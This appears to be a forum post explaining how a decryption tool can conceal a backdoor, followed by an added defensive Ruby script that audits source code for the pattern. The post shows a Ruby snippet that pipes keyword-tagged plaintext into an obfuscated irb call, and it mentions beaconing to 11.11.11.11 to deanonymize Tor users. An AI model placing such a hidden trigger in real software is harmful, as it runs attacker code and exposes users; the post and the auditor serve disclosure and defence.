It means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it. The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.

    # [105, 114, 98].pack("c*") evaluates to the string "irb"
    if decrypted_message.include?("gpg-privacy-toolkit")
      `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
    end

checks the plaintext for the string "gpg-privacy-toolkit" and if it finds it then the entire plaintext is launched as a Ruby script.

Edit: here I improved it a little bit; now it actually outputs the decrypted message, but if it has the 'magic' string in it then it sends packets to 11.11.11.11:80 (around Tor of course, unless you have taken configuration measures around this, like transparent proxy, firewall rules to drop traffic, isolated it somehow, etc.).

The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to `| #{[105, 114, 98].pack("c*")}`
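
A reviewer-side check for the pattern described in the post above, as an added example that is not part of the original post: it flags backtick commands built from runtime data and decodes any integer-array `pack` literal inside them. The names `audit_source`, `decode_pack_literals` and the interpreter watch list are assumptions made for this illustration, and the sample input is constructed from the snippet quoted in the post.

```ruby
# Added audit example: flags backtick shell-outs that interpolate data and
# decodes any [n, n, ...].pack("c*") literal hidden inside them.
PACK_LITERAL = /\[\s*((?:\d+\s*,\s*)*\d+)\s*\]\.pack\(\s*["'][cC]\*["']\s*\)/
BACKTICK_CMD = /`([^`]*)`/
INTERPRETERS = %w[irb ruby sh bash python perl].freeze # assumed watch list

# Return the strings spelled out by integer-array pack literals in +text+.
def decode_pack_literals(text)
  text.scan(PACK_LITERAL).map do |(nums)|
    bytes = nums.split(",").map { |n| n.strip.to_i & 0xff }
    bytes.pack("C*").force_encoding("UTF-8").scrub("?")
  end
end

# Audit Ruby source line by line (single-line backtick commands only).
def audit_source(text)
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    line.scan(BACKTICK_CMD) do |(cmd)|
      next unless cmd.include?('#{') # only commands built from runtime data
      hidden = decode_pack_literals(cmd)
      findings << {
        line: lineno,
        piped: cmd.include?("|"),
        hidden: hidden,
        interpreter: hidden.any? { |s| INTERPRETERS.include?(s) }
      }
    end
  end
  findings
end

# Constructed sample: the snippet from the post plus two harmless lines.
SAMPLE = <<~'RUBY'
  puts decrypted_message
  listing = `ls -l`
  if decrypted_message.include?("gpg-privacy-toolkit")
    `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  audit_source(SAMPLE).each { |f| puts f.inspect }
end
```

A finding with `interpreter: true` means decrypted plaintext reaches an interpreter's standard input, which is the one-line difference the post describes; the fixed `ls -l` call is not reported because nothing is interpolated into it.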